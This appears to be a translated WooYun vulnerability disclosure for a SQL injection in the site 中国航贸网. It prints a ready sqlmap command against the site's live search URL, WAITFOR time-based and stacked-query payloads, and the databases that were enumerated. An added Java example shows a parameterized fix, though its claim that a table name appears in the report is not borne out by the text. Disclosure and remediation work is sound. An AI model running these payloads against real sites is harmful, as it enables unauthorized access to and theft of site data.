
Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0167548

Title: A vulnerability in 中国航贸网 affects the security of the entire site's data

Vendor: 北京中航贸网络科技有限公司

Author: 路人甲

Submitted: 2016-01-06 10:18

Fix date: 2016-02-12 18:49

Published: 2016-02-12 18:49

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2016-02-12: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A vulnerability in 中国航贸网 compromises the entire site's data: over a million records plus a large amount of other data leaked

Detailed description:

sqlmap.py -u "http://www.snet.com.cn/cms/turnpage/turnpagesearch_en.jsp" --data "column_id=86%2C87%2C88&wherestr=88952634" --dbs

Proof of vulnerability:

Place: POST
Parameter: wherestr
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: column_id=86,87,88&wherestr=88952634'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: column_id=86,87,88&wherestr=88952634' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] adv
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] snet-1
[*] tempdb
Database: snet-1

[Screenshots: x1.jpg, x2.jpg]

Remediation:

Parameter filtering
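Added example, not code from the report or from the site's developers: the query shape that the sqlmap output above implies (string concatenation of column_id and wherestr) beside a parameterized version that implements the suggested remediation. The table name item_turnpage appears in the report; the column names, the LIKE clause and the exact query text are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
public class TurnpageSearch {
    // Vulnerable pattern (assumed shape, constructed for illustration): both request
    // parameters are concatenated into the SQL text, so a wherestr value such as
    //   88952634'; WAITFOR DELAY '0:0:5'--
    // closes the string literal and runs as a stacked query, as the sqlmap output reports.
    static String buildVulnerableQuery(String columnId, String whereStr) {
        return "SELECT * FROM item_turnpage WHERE column_id IN (" + columnId + ")"
             + " AND title LIKE '%" + whereStr + "%'";
    }
    // Hardened: column_id must be a comma-separated list of integers (an IN-list cannot
    // be a single bind variable, so each element gets its own '?'), and wherestr is bound
    // as data. LIKE metacharacters are escaped so the search text cannot become a wildcard.
    static List<Integer> parseColumnIds(String columnId) {
        List<Integer> ids = new ArrayList<>();
        for (String part : columnId.split(",")) {
            String s = part.trim();
            if (!s.matches("\\d{1,9}")) {
                throw new IllegalArgumentException("column_id must be a list of integers");
            }
            ids.add(Integer.parseInt(s));
        }
        return ids;
    }
    static String escapeLike(String s) {
        // Backslash is declared as the ESCAPE character in the prepared query below;
        // '[' is also a metacharacter in SQL Server LIKE patterns, so it is escaped too.
        return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_").replace("[", "\\[");
    }
    static PreparedStatement prepareSearch(Connection conn, String columnId, String whereStr)
            throws SQLException {
        List<Integer> ids = parseColumnIds(columnId);
        StringBuilder sql = new StringBuilder("SELECT * FROM item_turnpage WHERE column_id IN (");
        for (int i = 0; i < ids.size(); i++) {
            sql.append(i == 0 ? "?" : ", ?");
        }
        sql.append(") AND title LIKE ? ESCAPE '\\'");
        PreparedStatement ps = conn.prepareStatement(sql.toString());
        int idx = 1;
        for (Integer id : ids) ps.setInt(idx++, id);
        ps.setString(idx, "%" + escapeLike(whereStr) + "%");
        return ps;
    }
}
```

With the parameterized version, the payloads shown in the proof section are delivered to SQL Server as literal search text and never reach the query parser as SQL.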

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively refused to respond